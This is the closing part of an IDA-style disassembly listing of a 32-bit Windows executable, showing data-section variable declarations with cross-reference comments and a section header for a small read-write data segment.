dword_4248BC dd 0 ; DATA XREF: sub_41922D+3�r
; sub_41922D+1D�w ...
dword_4248C0 dd 0 ; DATA XREF: sub_419529+365�w
; sub_419529+37C�r
dword_4248C4 dd 0 ; DATA XREF: sub_419995+4F�r
; sub_419995+D8�r ...
dword_4248C8 dd 0 ; DATA XREF: sub_419995+FA�r
; sub_419995+100�w ...
dword_4248CC dd 0 ; DATA XREF: sub_4198F2+5�r
; sub_419903+A�r ...
dword_4248D0 dd 0 ; DATA XREF: sub_41AA23+9B�r
; sub_41AB84+9E�w ...
dword_4248D4 dd 0 ; DATA XREF: sub_41AA23+A8�r
; sub_41AB84+CC�w ...
dword_4248D8 dd 0 ; DATA XREF: sub_41AA23+BA�r
; sub_41AB84+FA�w ...
dword_4248DC dd 0 ; DATA XREF: sub_41AA23+D4�r
; sub_41AB84+128�w ...
dword_4248E0 dd 0 ; DATA XREF: sub_41AA23+F0�r
; sub_41AA23+10C�r ...
dword_4248E4 dd 0 ; DATA XREF: sub_41AA23+11E�r
; sub_41AA23+135�r ...
dword_4248E8 dd 0 ; DATA XREF: sub_41AA23+3F�r
; sub_41AB84+1B2�w ...
dword_4248EC dd 0 ; DATA XREF: sub_41AA23+5D�r
; sub_41AB84+1E0�w ...
dword_4248F0 dd 0 ; DATA XREF: sub_41AA23+13D�r
; sub_41AB84+20E�w ...
dword_4248F4 dd 0 ; DATA XREF: sub_41AA23+1E�r
; sub_41AB84+23C�w ...
dword_4248F8 dd 0 ; DATA XREF: sub_41AA23+C2�r
; sub_41AA23+FF�r ...
dword_4248FC dd 0 ; DATA XREF: sub_41AA23+6B�r
; sub_41AB84+298�w ...
dword_424900 dd 20h dup(0) ; DATA XREF: sub_41AA23+CF�o
; sub_41AB84+45�o ...
dword_424980 dd 0 ; DATA XREF: sub_41BF82+27�w
; sub_41BF82+32�r
align 8
dword_424988 dd 77FC5860h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_411310+3A8�o
; sub_41BB7C+6�o ...
byte_4249A0 db 0 ; DATA XREF: sub_41BF82+7�r
; sub_41BF82+15�r ...
align 4
dword_4249A4 dd 850000h ; DATA XREF: sub_41BA87+4�r
; sub_41BA87+22�w ...
dword_4249A8 dd 1000h dup(0) ; DATA XREF: sub_41BB7C+11�o
; sub_41BBE7+5�o
dword_4289A8 dd 0 ; DATA XREF: sub_41BF82+7C�r
; sub_41BF82+82�w ...
align 10h
dword_4289B0 dd 0 ; DATA XREF: sub_41015E+25�r
; sub_41015E+4A�r ...
dword_4289B4 dd 0 ; DATA XREF: sub_410253+BB�w
; sub_410253+10F�w ...
dword_4289B8 dd 2 dup(0) ; DATA XREF: sub_410386+32�o
dword_4289C0 dd 0 ; DATA XREF: sub_410253+2C�w
; sub_410253+57�o
align 8
dword_4289C8 dd 0 ; DATA XREF: sub_410253+36�w
dd 2 dup(0)
dword_4289D4 dd 0 ; DATA XREF: sub_410253+52�w
dd 4 dup(0)
dword_4289E8 dd 0 ; DATA XREF: sub_410253+40�w
align 10h
dword_4289F0 dd 0ECh dup(0) ; DATA XREF: sub_41C5E3+28�o
; sub_41C5E3+42�o ...
byte_428DA0 db 0 ; DATA XREF: sub_41C7DF+71�w
; sub_41C7DF+8F�r
byte_428DA1 db 0 ; DATA XREF: sub_41C7DF+7B�w
byte_428DA2 db 0 ; DATA XREF: sub_41C7DF+85�w
align 4
dd 13h dup(0)
dword_428DF0 dd 42h dup(0) ; DATA XREF: sub_41C7DF+B�o
; sub_41C7DF+17�o ...
dword_428EF8 dd 40h dup(0) ; DATA XREF: sub_41CD16+AB�o
; sub_41CDFA+5D�o
dword_428FF8 dd 77FC59E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_41CD16+25�o
; sub_41CD74�o ...
dword_429010 dd 0 ; DATA XREF: sub_41CD16+34�r
; sub_41CD16+4E�w ...
align 8
dword_429018 dd 77FC59C0h, 0 ; DATA XREF: sub_41D40A+6�o
; sub_41D6FE+25�o
dd 1, 0E0h, 2 dup(0)
byte_429030 db 1 ; DATA XREF: sub_41D332:loc_41D342�r
; sub_41D6FE+30�w
align 4
dword_429034 dd 8D09C8h ; DATA XREF: sub_418E90+D�r
; sub_418E90+26�r ...
dword_429038 dd 8D0C10h ; DATA XREF: sub_418B90+264�r
; sub_41D40A+72�w ...
dword_42903C dd 0 ; DATA XREF: sub_411310+3EF�w
dword_429040 dd 0 ; DATA XREF: sub_41E952+2F�w
; sub_41E952+47�r
byte_429044 db 0 ; DATA XREF: sub_41E952+4�r
; sub_41E952+12�r ...
align 4
dword_429048 dd 0 ; DATA XREF: sub_410A10+28�r
; sub_410A10+4C�w ...
dword_42904C dd 2 dup(0) ; DATA XREF: sub_410F10+C�o
dword_429054 dd 0 ; DATA XREF: sub_41072E+4�r
; sub_41072E+9D�r ...
dd 3 dup(0)
dword_429064 dd 0 ; DATA XREF: sub_410A10+C0�r
; sub_410D4F+A6�r
dd 0
dword_42906C dd 0 ; DATA XREF: sub_410D4F+26�r
; sub_410D4F:loc_410DB9�w
_5 ends
; Section 7. (virtual address 0002A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00029200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 42A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start